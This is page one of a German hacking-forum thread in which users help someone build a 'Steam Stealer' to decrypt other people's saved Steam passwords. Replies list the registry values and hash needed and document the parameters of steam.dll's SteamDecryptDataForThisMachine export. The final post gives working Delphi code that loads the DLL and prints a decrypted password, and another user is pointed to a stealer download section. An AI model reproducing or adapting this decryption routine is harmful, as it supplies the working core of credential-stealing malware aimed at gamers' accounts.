Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 13

Hybrid-Darstellung

  1. #1
    Gesperrt
    Registriert seit
    14.08.2008
    Beiträge
    854

    Standard Steam Stealer Hilfe

    Hey, ich wollt mal fragen was es mit SteamDecryptDataForThisMachine auf sich hat^^
    Möchte nen Steam Stealer coden aber weiß einfach nicht wie ich das Passwort decrypten kann. Also ich kann bisher nur die Namen und die 40 Zeichen nach dem wort "Pharse" auslesen.
    Also was benötige ich denn da noch um das Passwort zu bekommen?

  2. #2
    Bad Times Virus
    Registriert seit
    30.05.2009
    Beiträge
    614

    Standard

    Normalerweise benötigt man folgende Werte:

    - Hash (war der nich 92 Stellen nach "Phrase"?)
    - Username (nicht zum entschlüsseln notwendig)
    - ProductID
    - MachineGuid
    - IO

    Die letzten 3 Werte muss man aus der Registry auslesen, die Pfade sind aber je nach OS unterschiedlich glaube ich.
    ICQ: 599-744-616
    *\ Freund bietet ICQ 6er Digits (UINs) / Stück! +1 gratis 7er Uin! /* - ICQ : 576826717

  3. #3
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Naja es ist einfacher den Hash mittels der bereits erwähnten "SteamDecryptDataForThisMachine" Funktion innerhalb der Steam.dll zu Decrypten

    MfG

  4. #4
    Stiller Leser
    Registriert seit
    17.06.2009
    Beiträge
    4

    Standard

    kann mir jemand eienen link von eiinen steam stealer geben
    aba bitte keine virus und trojaner^^
    nen link bitte

  5. #5
    Gesperrt
    Registriert seit
    14.08.2008
    Beiträge
    854

    Standard

    Zitat Zitat von _florian15 Beitrag anzeigen
    kann mir jemand eienen link von eiinen steam stealer geben
    aba bitte keine virus und trojaner^^
    nen link bitte
    Meinst du jetzt nen Source oder fertigen Stealer?
    Wenn du nen fertigen Stealer meinst, würde ich dir empfehlen mal in die Stealer Section zu schauen.....


    #######

    @ThePapst
    Könnteste bissel erklären wie das funktioniert?
    Habe bei Google nicht wirklich was brauchbares gefunden.

  6. #6
    Stiller Leser
    Registriert seit
    17.06.2009
    Beiträge
    4

    Standard

    Zitat Zitat von ghosty Beitrag anzeigen
    Meinst du jetzt nen Source oder fertigen Stealer?
    Wenn du nen fertigen Stealer meinst, würde ich dir empfehlen mal in die Stealer Section zu schauen.....


    #######

    @ThePapst
    Könnteste bissel erklären wie das funktioniert?
    Habe bei Google nicht wirklich was brauchbares gefunden.
    ja was eben am sichersten und am einfachsten is wär ur nett!

  7. #7
    Bad Times Virus
    Registriert seit
    30.05.2009
    Beiträge
    614

    Standard

    @_florian15: Dir wurde deine Frage doch schon beantwortet, schau in der Toolz -> Stealer Section nach und les dich etwas in die Materie ein. Zeig Fleiß, dann wird dir auch geholfen, wenn du wo hängst.
    ICQ: 599-744-616
    *\ Freund bietet ICQ 6er Digits (UINs) / Stück! +1 gratis 7er Uin! /* - ICQ : 576826717

  8. #8
    is a Grammar Nazi Avatar von Hamtaro
    Registriert seit
    05.06.2007
    Beiträge
    431

    Standard

    Die steam.dll exportiert eine Funktion namens "SteamDecryptDataForThisMachine", diese Funktion wird von Steam intern genutzt um die PWs zu entschlüsseln.
    Es ist übrigens eine cdecl Funktion.
    Die Funktion erwartet als ersten Parameter einen AnsiString, der das verschlüsselte PW enthalten sollte.
    Der zweite Parameter ist vom Typ Integer und enthält die Länge des verschlüsselten PWs.
    der dritte Parameter ist ein Pointer dahin, wo das entschlüsselte PW gespeichert werden soll.
    der vierte ist ein Pointer auf einen Integer und enthält die Länge des Buffers.
    Rückgabewert ist ein Integer, falls das Ergebnis 0 ist, ist alles glattgelaufen.
    Sunshine, hurricane
    All the highs & lows

  9. #9
    Gesperrt
    Registriert seit
    14.08.2008
    Beiträge
    854

    Standard

    Ist vlt ne Dumme Frage aber hat vlt jemand nen Src, weiß wirklich net wie ich das machn muss.

  10. #10
    is a Grammar Nazi Avatar von Hamtaro
    Registriert seit
    05.06.2007
    Beiträge
    431

    Standard

    Also erstmal unterstützt VB6 "von Haus aus" kein Cdecl, vielleicht kann ThunderVb dir da helfen, sonst importierst du halt die Funktion mit GetProcAddress und rufst sie auf.
    Hier mal ein kleiner Delphicode von mir:
    Code:
    type
    TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl;
    
    procedure TForm1.Button1Click(Sender: TObject);
    var
    pwdecrypt : TSteamDecryptDataForThisMachine;
    encpwd : Pchar;
    retlength : UINT;
    password : array[0..99] of char;
    begin
    encpwd := '093760711C24A4FCB63F19FBA07DF366A7EF01751E1D21F70BBF32F47FD4E06E17D91449DA9396CA8D2B257FF4B1';
    pwdecrypt := GetProcAddress(LoadLibrary('C:\Program Files\Steam\steam.dll'),'SteamDecryptDataForThisMachine');
    Showmessage(IntToStr(pwdecrypt(encpwd, strlen(encpwd),@password, sizeof(password),@retlength)));
    
    showmessage(password);
    Sunshine, hurricane
    All the highs & lows

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •